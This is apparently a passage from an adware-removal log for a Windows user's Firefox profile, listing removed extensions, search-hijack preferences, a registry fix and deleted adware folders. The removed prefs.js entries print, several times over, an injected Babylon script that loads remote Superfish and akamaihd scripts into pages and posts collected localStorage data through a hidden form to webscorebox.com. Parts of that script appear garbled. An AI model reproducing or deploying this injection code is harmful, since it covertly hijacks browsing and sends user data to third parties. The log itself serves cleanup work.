Printing\\\\MozillaAddOn3\",\"mtime\":1352924793926}}},{\"name\":\"app-profile\",\"addons\":{\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019604},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019648},\"cjcdqvyuyu@odwkhl.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\cjcdqvyuyu@odwkhl.net\",\"mtime\":1367710019688},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019721},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019761},\"leethax@leethax.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\leethax@leethax.net.xpi\",\"mtime\":1365192788087},\"nfbednr@uuyy-.org\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\nfbednr@uuyy-.org\",\"mtime\":1367710019803},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019840},\"pdjx@iauy.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\pdjx@iauy.net\",\"mtime\":1367710019878},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019912},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019941},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019977}}}]");

---- Lines pdjx@iauy.net removed from user.js ----

---- Lines delta removed from prefs.js ----

---- Lines delta modified from prefs.js ----

---- Lines delta removed from user.js ----

user_pref("extensions.delta.tlbrSrchUrl", "");

user_pref("extensions.delta.id", "92b6c0a6000000000000d0df9a9b5b29");

user_pref("extensions.delta.appId", "{C26644C4-2A12-4CA6-8F2E-0EDE6CF018F3}");

user_pref("extensions.delta.instlDay", "15855");

user_pref("extensions.delta.vrsn", "1.8.21.5");

user_pref("extensions.delta.vrsni", "1.8.21.5");

user_pref("extensions.delta.vrsnTs", "1.8.21.522:05:22");

user_pref("extensions.delta.prtnrId", "delta");

user_pref("extensions.delta.prdct", "delta");

user_pref("extensions.delta.aflt", "babsst");

user_pref("extensions.delta.smplGrp", "none");

user_pref("extensions.delta.tlbrId", "base");

user_pref("extensions.delta.instlRef", "sst");

user_pref("extensions.delta.dfltLng", "en");

user_pref("extensions.delta.excTlbr", false);

user_pref("extensions.delta.ffxUnstlRst", true);

user_pref("extensions.delta.admin", false);

user_pref("extensions.delta_i.babTrack", "affID=119776&tt=300513_ctrl");

user_pref("extensions.delta_i.babExt", "");

user_pref("extensions.delta_i.srcExt", "ss");

user_pref("extensions.delta.autoRvrt", "false");

user_pref("extensions.delta.rvrt", "false");

user_pref("extensions.delta.newTab", false);

---- Lines WebSearch removed from prefs.js ----

user_pref("browser.search.defaultenginename", "WebSearch");

user_pref("browser.search.defaultenginename,S", "WebSearch");

user_pref("browser.search.defaulturl", "Tuvaro=");

user_pref("browser.search.order.1", "WebSearch");

user_pref("browser.search.order.1,S", "WebSearch");

user_pref("browser.search.selectedEngine", "WebSearch");

user_pref("browser.search.selectedEngine,S", "WebSearch");

user_pref("browser.startup.homepage", "Search");

user_pref("keyword.URL", "Tuvaro=");

---- Lines WebSearch modified from prefs.js ----

---- Lines Torntv removed from prefs.js ----

---- Lines Torntv modified from prefs.js ----

---- Lines babylon removed from prefs.js ----

user_pref("extensions.515f3ae58b5e1.scode", "(function(){try{if('aol.com,mail.google.com,premiumreports.info,search.babylon.com,search.gboxapp.com'.indexOf(window.self.location.hostname)>-1) return;}catch(e){};if((window.self.location.protocol=='http:' || window.self.location.hostname.indexOf('ogle')>-1) && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=btos&userId=5185945c0d31c5.66823698&CTID=p924';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//cdncache-a.akamaihd.net/loaders/1498/l.js?aoi=1311798366&pid=1498&zoneid=173710';document.getElementsByTagName(\"head\")[0].appendChild(script);};(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"zkicprmtr356=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"zkicprmtr356=\")){var d=a.match(/zkicprmtr356=(;f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var"]\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8pjchVWzmPhd9HqihEAen0pjs9tNhVCNqPB750qGhSCM06C7lGojsMh7VUoja=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;;if(-1==window.self.location.hostname.indexOf('mail.'))for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer.length)for(var i=0;i<c2soffer.length;i++)c2soffer.parentNode.removeChild(c2soffer);})();");

user_pref("extensions.51682c6333433.scode", "(function(){try{if('aol.com,mail.google.com,premiumreports.info,search.babylon.com,search.gboxapp.com'.indexOf(window.self.location.hostname)>-1) return;}catch(e){};if((window.self.location.protocol=='http:' || window.self.location.hostname.indexOf('ogle')>-1) && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=btos&userId=51859891529be4.78176228&CTID=p924';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//cdncache-a.akamaihd.net/loaders/1498/l.js?aoi=1311798366&pid=1498&zoneid=173710';document.getElementsByTagName(\"head\")[0].appendChild(script);};(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"zkicprmtr356=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"zkicprmtr356=\")){var d=a.match(/zkicprmtr356=(;f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var"]\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8pjchVWzmPhd9HqihEAen0pjs9tNhVCNqPB750qGhSCM06C7lGojsMh7VUoja=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;;if(-1==window.self.location.hostname.indexOf('mail.'))for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer.length)for(var i=0;i<c2soffer.length;i++)c2soffer.parentNode.removeChild(c2soffer);})();");

user_pref("extensions.516923512b9fa.scode", "(function(){try{if('aol.com,mail.google.com,premiumreports.info,search.babylon.com,search.gboxapp.com'.indexOf(window.self.location.hostname)>-1) return;}catch(e){};if((window.self.location.protocol=='http:' || window.self.location.hostname.indexOf('ogle')>-1) && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=btos&userId=5185945c0c1aa1.94484946&CTID=p924';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//cdncache-a.akamaihd.net/loaders/1498/l.js?aoi=1311798366&pid=1498&zoneid=173710';document.getElementsByTagName(\"head\")[0].appendChild(script);};(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"zkicprmtr356=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"zkicprmtr356=\")){var d=a.match(/zkicprmtr356=(;f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var"]\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8pjchVWzmPhd9HqihEAen0pjs9tNhVCNqPB750qGhSCM06C7lGojsMh7VUoja=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;;if(-1==window.self.location.hostname.indexOf('mail.'))for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer.length)for(var i=0;i<c2soffer.length;i++)c2soffer.parentNode.removeChild(c2soffer);})();");

user_pref("extensions.51693a78b4f3b.scode", "(function(){try{if('aol.com,mail.google.com,premiumreports.info,search.babylon.com,search.gboxapp.com'.indexOf(window.self.location.hostname)>-1) return;}catch(e){};if((window.self.location.protocol=='http:' || window.self.location.hostname.indexOf('ogle')>-1) && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=btos&userId=5185989154e9e5.22937288&CTID=p924';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//cdncache-a.akamaihd.net/loaders/1498/l.js?aoi=1311798366&pid=1498&zoneid=173710';document.getElementsByTagName(\"head\")[0].appendChild(script);};(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"zkicprmtr356=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"zkicprmtr356=\")){var d=a.match(/zkicprmtr356=(;f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var"]\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8pjchVWzmPhd9HqihEAen0pjs9tNhVCNqPB750qGhSCM06C7lGojsMh7VUoja=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;;if(-1==window.self.location.hostname.indexOf('mail.'))for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer.length)for(var i=0;i<c2soffer.length;i++)c2soffer.parentNode.removeChild(c2soffer);})();");

user_pref("extensions.516eb66a679d2.scode", "(function(){try{if('aol.com,mail.google.com,premiumreports.info,search.babylon.com,search.gboxapp.com'.indexOf(window.self.location.hostname)>-1) return;}catch(e){};if((window.self.location.protocol=='http:' || window.self.location.hostname.indexOf('ogle')>-1) && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=btos&userId=5185945c14b460.30704261&CTID=p924';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//cdncache-a.akamaihd.net/loaders/1498/l.js?aoi=1311798366&pid=1498&zoneid=173710';document.getElementsByTagName(\"head\")[0].appendChild(script);};(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"zkicprmtr356=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"zkicprmtr356=\")){var d=a.match(/zkicprmtr356=(;f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var"]\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8pjchVWzmPhd9HqihEAen0pjs9tNhVCNqPB750qGhSCM06C7lGojsMh7VUoja=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;;if(-1==window.self.location.hostname.indexOf('mail.'))for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer.length)for(var i=0;i<c2soffer.length;i++)c2soffer.parentNode.removeChild(c2soffer);})();");

user_pref("extensions.516eddb981500.scode", "(function(){try{if('aol.com,mail.google.com,premiumreports.info,search.babylon.com,search.gboxapp.com'.indexOf(window.self.location.hostname)>-1) return;}catch(e){};if((window.self.location.protocol=='http:' || window.self.location.hostname.indexOf('ogle')>-1) && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=btos&userId=51859891570186.86790902&CTID=p924';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self.location.protocol.indexOf('http')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//cdncache-a.akamaihd.net/loaders/1498/l.js?aoi=1311798366&pid=1498&zoneid=173710';document.getElementsByTagName(\"head\")[0].appendChild(script);};(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"zkicprmtr356=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"zkicprmtr356=\")){var d=a.match(/zkicprmtr356=(;f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var"]\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8pjchVWzmPhd9HqihEAen0pjs9tNhVCNqPB750qGhSCM06C7lGojsMh7VUoja=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;;if(-1==window.self.location.hostname.indexOf('mail.'))for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById('c2soffer')&&document.getElementById('c2soffer').parentNode.removeChild(document.getElementById('c2soffer'))},100*i);var c2soffer=document.querySelectorAll('div.c2soffer');if(c2soffer.length)for(var i=0;i<c2soffer.length;i++)c2soffer.parentNode.removeChild(c2soffer);})();");

user_pref("extensions.BabylonToolbar.prtkDS", 0);

user_pref("extensions.BabylonToolbar.prtkHmpg", 0);

---- Lines babylon modified from prefs.js ----

---- Lines Downloader.com removed from prefs.js ----

---- Lines Downloader.com modified from prefs.js ----

---- Lines SweetIM removed from prefs.js ----

user_pref("sweetim.toolbar.previous.browser.startup.homepage", "");

user_pref("sweetim.toolbar.scripts.1.domain-blacklist", "");

user_pref("sweetim.toolbar.searchguard.enable", "");

user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_DS", "");

user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_HP", "");

---- Lines SweetIM modified from prefs.js ----

---- FireFox user.js and prefs.js backups ----

user_24-07-2013_1233_.backup

prefs_24-07-2013_1233_.backup

==== Registry Fix Code ======================

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs]

"bProtectTabs"=-

==== Deleting Files \ Folders ======================

"C:\user.js" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\searchplugins\delta.xml" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\searchplugins\WebSearch.xml" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\torntv2@torntv.com.xpi" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\searchplugins\babylon.xml" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\ftdownloader4@ftdownloader.com.xpi" deleted

"C:\Windows\SysNative\roboot64.exe" deleted

"C:\windows\SysNative\Tasks\GoforFilesUpdate" deleted

"C:\user.js" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\searchplugins\babylon.xml" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\searchplugins\WebSearch.xml" deleted

"C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default\extensions\ftdownloader4@ftdownloader.com.xpi" deleted

"C:\Users\Kim\Burger Shop 2.exe" deleted

"C:\Users\Kim\Shop-N-Spree Family Fortune.exe" deleted

"C:\Program Files (x86)\TornTV.com" deleted

"C:\ProgramData\BBrowsee2sauvee" deleted

"C:\ProgramData\BrooWese22saove" deleted

"C:\ProgramData\BrouwsEe2save" deleted

"C:\ProgramData\Browseo2sAAviee" deleted

"C:\ProgramData\Browusue2suave" deleted

"C:\ProgramData\conotinuetossave" deleted

"C:\ProgramData\contiinUEEtosaVe" deleted

"C:\ProgramData\conTinuEtosaavee" deleted

"C:\ProgramData\conytyinnuuetuoussaovvei" deleted

"C:\ProgramData\safe saaVE" deleted

"C:\ProgramData\SeaRch-NewiTaab" deleted

"C:\ProgramData\SEarcHH-NNeWWTTaab" deleted

"C:\ProgramData\SearchNewTab" deleted

"C:\ProgramData\Searochh-NuewaTaab" deleted

"C:\ProgramData\SeArrcHH-NeewTab" deleted

"C:\ProgramData\Searrcho--NNeuwuTAbi" deleted

"C:\Program Files (x86)\FTDownloader.com" deleted

"C:\Program Files (x86)\FTDownloader.com" deleted

"C:\Program Files (x86)\Solibo Ltd" deleted

"C:\Program Files (x86)\GoforFiles" deleted

"C:\Program Files (x86)\WebSearch" deleted

"C:\Program Files (x86)\Gophoto.it" deleted

"C:\Program Files (x86)\File Scout" deleted

"C:\Program Files (x86)\Conduit" deleted

"C:\Users\Kim\AppData\Roaming\GoforFiles" deleted

"C:\Users\Kim\AppData\Roaming\Babylon" deleted

"C:\Users\Kim\AppData\Roaming\File Scout" deleted

"C:\Users\Kim\AppData\Roaming\YoudaGames" deleted

"C:\Users\Kim\AppData\Roaming\iWin" deleted

"C:\Users\Kim\AppData\Roaming\NCdownloader" deleted

"C:\Users\Kim\AppData\Roaming\Systweak" deleted

"C:\Users\Kim\AppData\Roaming\PerformerSoft" deleted

"C:\ProgramData\StarApp" deleted

"C:\ProgramData\BetterSoft" deleted

"C:\ProgramData\SoftSafe" deleted

"C:\ProgramData\iWin" deleted

"C:\ProgramData\SearchNewTab" deleted

"C:\ProgramData\IBUpdaterService" deleted

"C:\ProgramData\InstallMate" deleted

"C:\ProgramData\Tarma Installer" deleted

"C:\ProgramData\Babylon" deleted

"C:\ProgramData\Trymedia" deleted

"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Solibo Ltd" deleted

"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BrooWese22saove" deleted

"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BrouwsEe2save" deleted

"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Browseo2sAAviee" deleted

"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Browusue2suave" deleted

"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\contiinUEEtosaVe" deleted

"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\conTinuEtosaavee" deleted

"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\conytyinnuuetuoussaovvei" deleted

